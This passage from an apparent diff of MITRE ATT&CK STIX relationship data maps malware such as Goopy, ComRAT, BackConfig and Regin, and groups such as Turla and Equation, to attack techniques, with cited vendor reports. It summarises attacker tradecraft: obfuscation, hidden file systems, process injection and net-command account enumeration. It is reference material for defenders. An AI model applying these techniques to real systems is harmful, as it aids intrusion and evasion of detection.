+ "id": "relationship--80e484a4-e5b5-4de1-81c7-2bd1a927d156",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.012Z",
+ "created": "2020-06-26T16:17:18.161Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has used a polymorphic decryptor to decrypt itself at runtime.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--c9aa1bb6-874a-4de6-84c8-e1e9d1d112d0",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.010Z",
+ "created": "2020-06-26T16:17:18.188Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has checked for the Google Updater process to ensure [Goopy](https://attack.mitre.org/software/S0477) was loaded properly.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--afffac16-cc57-4b01-8325-d88ab73454e1",
+ "type": "relationship",
+ "modified": "2020-06-26T16:17:18.191Z",
+ "created": "2020-06-26T16:17:18.191Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--097a4294-e9e6-46a1-8ecb-06ab0b00d773",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.047Z",
+ "created": "2020-06-26T16:17:18.193Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to enumerate the infected system's user name via GetUserNameW.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--c6c9fa0e-988e-4c14-a30f-d6576572a2d9",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.050Z",
+ "created": "2020-06-26T16:17:18.195Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--e8edf0d8-3c24-4082-9177-1bfb6e7d95c6",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.053Z",
+ "created": "2020-06-26T16:17:18.217Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477)'s decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--6bf3a83b-d66d-4b6a-972c-c348686ebecb",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.052Z",
+ "created": "2020-06-26T16:17:18.220Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has been signed with self signed digital certificates mimicking a legitimate software company.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--01b97c8a-f08c-4f54-a401-14d888ca79b9",
+ "type": "relationship",
+ "modified": "2020-06-26T17:21:35.251Z",
+ "created": "2020-06-26T17:21:35.251Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) can download and run batch files to execute commands on a compromised host.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--06aa7096-4813-4f50-a69a-7bcd6503ffe4",
+ "type": "relationship",
+ "modified": "2020-06-29T15:22:59.266Z",
+ "created": "2020-06-26T17:21:35.288Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) can leverage API functions such as ShellExecuteA and HttpOpenRequestA in the process of downloading and executing files.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1c0296de-dc33-4fd7-b774-1bbe8c1b56b7",
+ "type": "relationship",
+ "modified": "2020-06-29T15:59:08.691Z",
+ "created": "2020-06-26T17:21:35.290Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
+ "target_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7",
+ "relationship_type": "uses",
+ "id": "relationship--19cc1620-de41-4076-b5b8-9d64364a578a",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has used BITS jobs to download malicious payloads.(Citation: Unit 42 BackConfig May 2020)",
+ "type": "relationship",
+ "modified": "2020-06-26T17:55:45.067Z",
+ "created": "2020-06-26T17:48:54.913Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--e398ecb9-1e98-4518-aff8-aa18f527f9dc",
+ "type": "relationship",
+ "modified": "2020-06-28T22:55:55.826Z",
+ "created": "2020-06-28T22:55:55.826Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to discover drive information on the infected host.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--4b2baed3-8e3c-4ab6-9b92-f147a9ab7d13",
+ "type": "relationship",
+ "modified": "2020-06-29T00:47:26.915Z",
+ "created": "2020-06-29T00:47:26.915Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da2ef4a9-7cbe-400a-a379-e2f230f28db3",
+ "target_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "external_references": [
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html",
+ "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.",
+ "source_name": "FireEye Bootkits"
+ }
+ ],
+ "description": "[BOOTRASH](https://attack.mitre.org/software/S0114) has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.(Citation: FireEye Bootkits)",
+ "relationship_type": "uses",
+ "id": "relationship--29a6afc7-f051-4c26-b6a2-cad09c73180f",
+ "type": "relationship",
+ "modified": "2020-06-29T01:35:30.267Z",
+ "created": "2020-06-29T01:35:30.267Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--96e239be-ad99-49eb-b127-3007b8c1bec9",
+ "target_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Equation QA",
+ "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.",
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf"
+ }
+ ],
+ "description": "[Equation](https://attack.mitre.org/groups/G0020) has used an encrypted virtual file system stored in the Windows Registry.(Citation: Kaspersky Equation QA)",
+ "relationship_type": "uses",
+ "id": "relationship--00caa57d-7b0f-4156-907e-18d14d62965a",
+ "type": "relationship",
+ "modified": "2020-06-29T01:39:22.199Z",
+ "created": "2020-06-29T01:39:22.199Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656",
+ "target_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "external_references": [
+ {
+ "source_name": "Kaspersky ProjectSauron Full Report",
+ "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.",
+ "url": "https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf"
+ }
+ ],
+ "description": "[Strider](https://attack.mitre.org/groups/G0041) has used a hidden file system that is stored as a file on disk.(Citation: Kaspersky ProjectSauron Full Report)",
+ "relationship_type": "uses",
+ "id": "relationship--d24a47e5-e735-4cad-9c44-09d3a39d514c",
+ "type": "relationship",
+ "modified": "2020-06-29T01:43:19.527Z",
+ "created": "2020-06-29T01:43:19.527Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
+ "target_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Regin",
+ "description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ }
+ ],
+ "description": "[Regin](https://attack.mitre.org/software/S0019) has used a hidden file system to store some of its components.(Citation: Kaspersky Regin)",
+ "relationship_type": "uses",
+ "id": "relationship--223b8d4b-97e9-4581-91aa-a599fb787309",
+ "type": "relationship",
+ "modified": "2020-06-29T01:54:53.487Z",
+ "created": "2020-06-29T01:50:21.819Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used net group \"Domain Admins\" /domain to identify domain administrators.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bcd2cfa1-793c-40a7-9920-614539e651a7",
+ "type": "relationship",
+ "modified": "2020-06-29T02:52:31.516Z",
+ "created": "2020-06-29T02:52:31.516Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used net localgroup and net localgroup Administrators to enumerate group information, including members of the local administrators group.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--059cc1e2-9570-4760-8137-d3d71b66bb78",
+ "type": "relationship",
+ "modified": "2020-06-29T02:52:31.565Z",
+ "created": "2020-06-29T02:52:31.565Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used net user /domain to enumerate domain accounts.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--689d5a99-cfcf-43d6-ae55-9bf920986f63",
+ "type": "relationship",
+ "modified": "2020-06-29T02:52:31.569Z",
+ "created": "2020-06-29T02:52:31.569Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used net user to enumerate local accounts on the system.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8a47e81d-be1f-488c-8136-40e18c70d45f",
+ "type": "relationship",
+ "modified": "2020-06-29T02:52:31.571Z",
+ "created": "2020-06-29T02:52:31.571Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used net accounts and net accounts /domain to acquire password policy information.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f946b4f9-a18e-4a1e-856c-2c215f78f8be",
+ "type": "relationship",
+ "modified": "2020-06-29T02:56:20.597Z",
+ "created": "2020-06-29T02:56:20.597Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--150e1b1c-a575-4542-a66e-c1646212744b",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.132Z",
+ "created": "2020-06-29T03:10:22.271Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used a scheduled task to launch its PowerShell loader.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--19153106-5607-4cac-91a5-c2a900bc5343",
+ "type": "relationship",
+ "modified": "2020-06-29T03:27:50.994Z",
+ "created": "2020-06-29T03:27:50.994Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module. [ComRAT](https://attack.mitre.org/software/S0126) has also used a unique password to decrypt the file used for its hidden file system.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ad8fdfa4-5e0b-437d-9723-9bc5a272f465",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.141Z",
+ "created": "2020-06-29T03:27:51.019Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used encryption and base64 to obfuscate its orchestrator code in the Registry. [ComRAT](https://attack.mitre.org/software/S0126) has also embedded an XOR encrypted communications module inside the orchestrator module. [ComRAT](https://attack.mitre.org/software/S0126) has encrypted its virtual file system using AES-256 in XTS mode.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3a86072e-4ca6-4b5d-bf31-b17c250f572e",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.174Z",
+ "created": "2020-06-29T03:27:51.057Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has encrypted and stored its orchestrator code in the Registry.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c2496cf4-b502-44cf-ae85-efb9b882a4b1",
+ "type": "relationship",
+ "modified": "2020-06-29T03:27:51.063Z",
+ "created": "2020-06-29T03:27:51.063Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has injected its orchestrator DLL into explorer.exe. [ComRAT](https://attack.mitre.org/software/S0126) has also injected its communications module into the victim's default browser to make C2 connections appear less suspicious as all network connections will be initiated by the browser process.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--39647c47-c73d-4da7-9b1a-8c67f20c1890",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.169Z",
+ "created": "2020-06-29T03:27:51.065Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
